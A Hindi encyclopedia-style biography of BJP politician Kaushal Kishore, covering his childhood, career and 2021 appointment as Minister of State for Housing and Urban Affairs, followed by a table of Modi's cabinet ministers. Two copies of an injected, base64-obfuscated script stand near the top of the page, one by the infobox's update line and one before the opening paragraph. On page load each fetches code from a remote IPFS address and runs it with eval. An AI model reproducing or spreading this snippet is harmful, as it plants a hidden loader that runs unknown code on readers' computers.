कौशल किशोर
कौशल किशोर
| |
पूरा नाम | कौशल किशोर |
जन्म | 25 जनवरी, 1960 |
जन्म भूमि | गाँव बेगरिया, तहसील मोहनलाल गंज, लखनऊ, उत्तर प्रदेश |
पति/पत्नी | जय देवी |
संतान | चार |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | राज्य मंत्री, शहरी विकास एवं आवास मंत्रालय- 7 जुलाई, 2021 से |
संबंधित लेख | नरेन्द्र मोदी का मंत्रिमण्डल, नरेन्द्र मोदी |
अद्यतन | 14:10, 18 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>कौशल किशोर (अंग्रेज़ी: Kaushal Kishore, जन्म- 25 जनवरी, 1960) भारतीय जनता पार्टी के राजनीतिज्ञ और 16वीं लोकसभा के सांसद हैं। साल 2014 के चुनावों में वे उत्तर प्रदेश की मोहनलाल गंज सीट से भारतीय जनता पार्टी के टिकट पर चुनाव लड़कर निर्वाचित हुए थे। 7 जुलाई, 2021 को प्रधानमंत्री नरेन्द्र मोदी के मंत्रिमण्डल में विस्तार तथा फेरबदल के बाद कौशल किशोर को 'शहरी विकास एवं आवास मंत्रालय में राज्य मंत्री' बनाया गया है।
परिचय
कौशल किशोर उत्तर प्रदेश के मोहनलालगंज से बीजेपी सांसद हैं। अपने 30 सालों के राजनीतिक करियर में कौशल किशोर दो बार लोकसभा सांसद रहे हैं और वह साल 2003-2004 में मुलायम सिंह यादव की सरकार में राज्य मंत्री भी रह चुके हैं। कौशल किशोर का जन्म यूपी के बेगरिया गांव, लखनऊ में ही सन् 1960 में हुआ था। 61 साल के हो चुके कौशल किशोर को हाल ही में बीजेपी अनुसूचित जाति मोर्चा का राज्य प्रमुख बनाया गया था। वह साल 2002 से 2007 तक उत्तर प्रदेश में विधायक भी रह चुके हैं। कौशल किशोर पासी समुदाय से आते हैं। उनको अनुसूचित जातियों में गहरी पैठ वाला नेता माना जाता है।[१]
खास बात यह है कि हाल ही में कौशल किशोर ने उत्तर प्रदेश में कोरोना प्रबंधन ठीक न होने को लेकर मुख्यमंत्री योगी आदित्यनाथ की सरकार को निशाने पर लिया था। दरअसल, कौशल किशोर ने इसी साल (अप्रैल, 2021) में कोरोना की वजह से अपने भाई को खो दिया था। इसके बाद उन्होंने सीएम योगी को चिट्ठी लिखकर दो सरकारी अस्पतालों में कुप्रंबधन पर सवाल खड़े किए थे।
बहादुरी की मिसाल
लखनऊ के मोहनलाल गंज तहसील के बेगरिया गांव में जन्में कौशल किशोर पासी जाति के किसान परिवार से आते हैं। बचपन में ज्यादा पैसे न होने के कारण उनके पास बहुत सीमित साधन थे। पढ़ाई-लिखाई में एवरेज, लेकिन अपनी ईमानदारी और जिज्ञासु दिमाग के लिए कौशल किशोर खूब चर्चित थे। उनके गांव वाले उन्हें बहादुरी की मिसाल मानते हैं। वे कहते थे कि कोई भी कौशल का सामना करने की हिम्मत नहीं कर सकता, क्योंकि वह हमेशा सच और सही के लिए खड़े रहते हैं।
अन्याय विरोधी
बताया जाता है कि उनके माता-पिता उनकी चिंता में ही रहते थे, क्योंकि कौशल सच की लड़ाई के लिए किसी से भी भिड़ जाया करते थे। वे उन छात्रों के साथ हमेशा खड़े रहते थे, जो कमजोर या किसी भी प्रकार के शोषण और भेदभाव के अधीन थे। बचपन में जब उनसे पूछा जाता था कि वह खुद लड़ाई को न्योता देकर घरवालों की परेशानी क्यों बढ़ाते हैं, तो उनके पास कोई जवाब नहीं होता था। लेकिन अब कौशल किशोर कहते हैं कि यह उनकी न्याय की भावना थी जो उन्हें उन लोगों से मुकाबला करने के लिए प्रेरित करती थी। यह भी बताया जाता है कि अगर पिता उनकी माता पर आवाज उठा भी दें तो कौशल उन्हें भी रोकते थे। कौशल किशोर अन्याय होते नहीं देख सकते थे।[२]
किसानों के मददगार
लखनऊ के कालीचरण इंटर कॉलेज से इंटरमीडिएट की परीक्षा पास करने के बाद कौशल किशोर ने सी.आर. डिग्री कॉलेज में एडमिशन लिया। हालांकि, वह अपनी पढ़ाई पूरी नहीं कर सके क्योंकि वह पारिवारिक बीमारी, और मजदूरों और किसानों की मदद में शामिल हो गए थे।
संघर्षों भरा जीवन
जिस गांव में कौशल किशोर का जन्म हुआ, वहां पक्की सड़क और बिजली की सुविधा नहीं थी। ऐसे में वह अक्सर प्रशासनिक अधिकारियों और स्थानीय नेताओं के पास जाते थे और इस मुद्दे पर और गांव के उत्थान पर बात करते थे। कौशल किशोर का बचपन काफी संघर्ष भरा रहा। वह शिक्षा ग्रहण करने के लिए 20 किलोमीटर पैदल जाते थे। साल 1977 में, 12वीं कक्षा में जब उन्हें स्कॉलरशिप मिली, तब जाकर कौशल किशोर ने एक साइकिल खरीदी। अपनी मेहनत और लगन से आज राजनीति में उनका बड़ा नाम है।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ कोरोना काल में योगी सरकार पर उठाए थे सवाल (हिंदी) livehindustan.com। अभिगमन तिथि: 18 जुलाई, 2021।
- ↑ मोहनलाल गंज के सांसद कौशल किशोर ने ली मंत्री पद की शपथ (हिंदी) zeenews.india.com। अभिगमन तिथि: 18 जुलाई, 2021।
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
प्रधानमंत्री | ||
---|---|---|
नरेन्द्र मोदी | 1. कार्मिक, लोक शिकायत एवं पेंशन मंत्रालय 2. परमाणु ऊर्जा विभाग | |
कैबिनेट मंत्री | ||
1. | राजनाथ सिंह | रक्षा मंत्रालय |
2. | अमित शाह | 1. गृह मंत्रालय 2. सहकारिता मंत्रालय |
3. | नितिन जयराम गडकरी | सड़क परिवहन एवं राजमार्ग मंत्रालय |
4. | निर्मला सीतारमण | 1. वित्त मंत्रालय 2. कारपोरेट कार्य मंत्रालय |
5. | नरेन्द्र सिंह तोमर | कृषि एवं कृषक कल्याण मंत्रालय |
6. | सुब्रह्मण्यम जयशंकर | विदेश मंत्री |
7. | अर्जुन मुंडा | जनजातीय कार्य मंत्री |
8. | स्मृति जुबिन ईरानी | महिला एवं बाल विकास मंत्री |
9. | पीयूष गोयल | 1. कपड़ा मंत्रालय 2. वाणिज्य और उद्योग मंत्रालय |
10. | धर्मेन्द्र प्रधान | 1. शिक्षा मंत्रालय 2. कौशल विकास और उद्यमिता मंत्रालय |
11. | प्रह्लाद जोशी | 1. संसदीय मामलों के मंत्री 2. कोयला मंत्रालय |
12. | नारायण तातू राणे | सूक्ष्म, लघु एवं मध्यम उद्यम मंत्री |
13. | सर्बानन्द सोनोवाल | 1. बंदरगाह, नौवहन और जलमार्ग मंत्रालय 2. आयुष मंत्रालय |
14. | मुख़्तार अब्बास नक़वी | अल्पसंख्यक मंत्रालय |
15. | वीरेन्द्र कुमार खटीक | सामाजिक न्याय और अधिकारिता मंत्रालय |
16. | गिरिराज सिंह | 1. ग्रामीण विकास मंत्रालय 2. पंचायती राज मंत्रालय |
17. | ज्योतिरादित्य एम. सिंधिया | नागरिक उड्डयन मंत्रालय |
18. | रामचंद्र प्रसाद सिंह | इस्पात मंत्रालय |
19. | अश्विनी वैष्णव | 1. रेल मंत्रालय 2. संचार मंत्रालय |
20. | पशुपति कुमार पारस | खाद्य प्रसंस्करण उद्योग मंत्रालय |
21. | गजेंद्र सिंह शेखावत | जल शक्ति मंत्रालय |
22. | किरण रिजिजू | कानून और न्याय मंत्रालय |
23. | राजकुमार सिंह | 1. विद्युत मंत्रालय 2. नवीन और नवीकरणीय ऊर्जा मंत्रालय |
24. | हरदीप सिंह पुरी | 1. पेट्रोलियम एवं प्राकृतिक गैस मंत्रालय 2. आवास और शहरी मामलों के मंत्रालय |
25. | मनसुख मंडाविया | 1. स्वास्थ्य और परिवार कल्याण मंत्रालय 2. रासायनिक उर्वरक मंत्रालय |
26. | भूपेन्द्र यादव | 1. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय 2. श्रम और रोजगार मंत्रालय |
27. | महेंद्र नाथ पाण्डेय | भारी उद्योग मंत्रालय |
28. | पुरुषोत्तम रूपाला | मत्स्य पालन, पशुपालन और डेयरी मंत्रालय |
29. | जी. किशन रेड्डी | 1. संस्कृति मंत्रालय 2. पर्यटन मंत्रालय |
30. | अनुराग ठाकुर | 1.सूचना और प्रसारण मंत्रालय 2. युवा मामले और खेल मंत्रालय |
राज्य मंत्री (स्वतंत्र प्रभार) | ||
1. | राव इन्द्रजीत सिंह | 1. सांख्यिकी और कार्यक्रम कार्यान्वयन मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) 2. योजना मंत्रालय |
2. | जितेन्द्र सिंह (भाजपा) | 1. विज्ञान और प्रौद्योगिकी मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) 2. पृथ्वी विज्ञान मंत्रालय के राज्य मंत्री (स्वतंत्र प्रभार) |
राज्य मंत्री | ||
1. | श्रीपद येस्सो नायक | 1. बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री 2. पर्यटन मंत्रालय में राज्य मंत्री |
2. | फग्गन सिंह कुलस्ते | 1. इस्पात मंत्रालय में राज्य मंत्री 2. ग्रामीण विकास मंत्रालय में राज्य मंत्री |
3. | प्रहलाद सिंह पटेल | 1. जल शक्ति मंत्रालय में राज्य मंत्री 2. खाद्य प्रसंस्करण उद्योग मंत्रालय में राज्य मंत्री |
4. | अश्विनी कुमार चौबे | 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री 2. पर्यावरण, वन और जलवायु परिवर्तन मंत्रालय में राज्य मंत्री |
5. | अर्जुन राम मेघवाल | 1. संसदीय कार्य मंत्रालय में राज्य मंत्री 2. संस्कृति मंत्रालय में राज्य मंत्री |
6. | जनरल (सेवानिवृत्त) वी. के. सिंह | 1. सड़क परिवहन और राजमार्ग मंत्रालय में राज्य मंत्री 2. नागर विमानन मंत्रालय में राज्य मंत्री |
7. | कृष्ण पाल गुर्जर | 1. विद्युत मंत्रालय में राज्य मंत्री 2. भारी उद्योग मंत्रालय में राज्य मंत्री |
8. | रावसाहेब दानवे | 1. रेल मंत्रालय में राज्य मंत्री 2. कोयला मंत्रालय में राज्य मंत्री |
9. | रामदास अठावले | सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री |
10. | साध्वी निरंजन ज्योति | 1. उपभोक्ता मामले, खाद्य और सार्वजनिक वितरण मंत्रालय में राज्य मंत्री
2. ग्रामीण विकास मंत्रालय में राज्य मंत्री |
11. | डॉ. संजीव कुमार बालयान | पशुपालन, मत्स्य पालन और दुग्ध उत्पादन मंत्रालय में राज्य मंत्री |
12. | नित्यानंद राय | गृह मंत्रालय में राज्य मंत्री |
13. | पंकज चौधरी | वित्त मंत्रालय में राज्य मंत्री |
14. | अनुप्रिया सिंह पटेल | उद्योग एवं वाणिज्य मंत्रालय में राज्य मंत्री |
15. | एस. पी. सिंह बघेल | न्याय और कानून मंत्रालय में राज्य मंत्री |
16. | राजीव चंद्रशेखर | 1. कौशल विकास और उद्यमिता मंत्रालय में राज्य मंत्री 2. इलेक्ट्रॉनिक्स और सूचना प्रौद्योगिकी मंत्रालय में राज्य मंत्री |
17. | शोभा करंदलाजे | कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री |
18. | भानु प्रताप सिंह वर्मा | लघु, मध्यम और सूक्ष्म उद्योग मंत्रालय में राज्य मंत्री |
19. | दर्शना जरदोश | 1. कपड़ा मंत्रालय में राज्य मंत्री
2. रेल मंत्रालय में राज्य मंत्री |
20. | वी. मुरलीधरन | 1. विदेश मंत्रालय में राज्य मंत्री 2. संसदीय कार्य मंत्रालय में राज्य मंत्री |
21. | मीनाक्षी लेखी | 1. विदेश मंत्रालय में राज्य मंत्री 2. संस्कृति मंत्रालय में राज्य मंत्री |
22. | सोम प्रकाश | वाणिज्य और उद्योग मंत्रालय में राज्य मंत्री |
23. | रेणुका सिंह सरुता | आदिवासी मंत्रालय में राज्य मंत्री |
24. | रामेश्वर तेली | 1. पेट्रोलियम और प्राकृतिक गैस मंत्रालय में राज्य मंत्री 2. श्रम और रोजगार मंत्रालय में राज्य मंत्री |
25. | कैलाश चौधरी | कृषि और किसान कल्याण मंत्रालय में राज्य मंत्री |
26. | अन्नपूर्णा देवी यादव | शिक्षा मंत्रालय में राज्य मंत्री |
27. | ए. नारायणस्वामी | सामाजिक न्याय मंत्रालय में राज्य मंत्री |
28. | कौशल किशोर | शहरी विकास एवं आवास मंत्रालय में राज्य मंत्री |
29. | अजय भट्ट | 1. रक्षा मंत्रालय में राज्य मंत्री 2. पर्यटन मंत्रालय में राज्य मंत्री |
30. | बी. एल. वर्मा | 1. उत्तर पूर्वी क्षेत्र के विकास मंत्रालय में राज्य मंत्री 2. सहकारिता मंत्रालय में राज्य मंत्री |
31. | अजय कुमार मिश्रा | गृह मंत्रालय में राज्य मंत्री |
32. | देवुसिंह चौहान | संचार मंत्रालय में राज्य मंत्री |
33. | भगवंत खुबा | 1. नवीन और नवीकरणीय ऊर्जा मंत्रालय में राज्य मंत्री 2. रसायन और उर्वरक मंत्रालय में राज्य मंत्री |
34. | कपिल पाटिल | पंचायती राज मंत्रालय में राज्य मंत्री |
35. | प्रतिमा भौमिक | सामाजिक न्याय और अधिकारिता मंत्रालय में राज्य मंत्री |
36. | सुभाष सरकार | शिक्षा मंत्रालय में राज्य मंत्री |
37. | डॉ. भागवत किशनराव कराड | वित्त मंत्रालय में राज्य मंत्री |
38. | राजकुमार रंजन सिंह | 1. विदेश मंत्रालय में राज्य मंत्री 2. शिक्षा मंत्रालय में राज्य मंत्री |
39. | डॉ. भारती प्रवीण पवार | स्वास्थ्य एवं परिवार कल्याण मंत्रालय में राज्य मंत्री |
40. | बिश्वेश्वर टुडू | 1. जनजातीय मामलों के मंत्रालय में राज्य मंत्री 2. जल शक्ति मंत्रालय में राज्य मंत्री |
41. | शांतनु ठाकुर | बंदरगाह, जहाजरानी और जलमार्ग मंत्रालय में राज्य मंत्री |
42. | डॉ. मुंजापारा महेंद्रभाई | 1. महिला एवं बाल विकास मंत्रालय में राज्य मंत्री 2. आयुष मंत्रालय में राज्य मंत्री |
43. | जॉन बारला | अल्पसंख्यक मंत्रालय में राज्य मंत्री |
44. | एल. मुरुगन | 1. मत्स्य पालन, पशुपालन और डेयरी मंत्रालय में राज्य मंत्री 2. सूचना एवं प्रसारण मंत्रालय में राज्य मंत्री |
45. | निसिथ प्रमाणिक | 1. गृह मंत्रालय में राज्य मंत्री 2. युवा मामले और खेल मंत्रालय में राज्य मंत्री |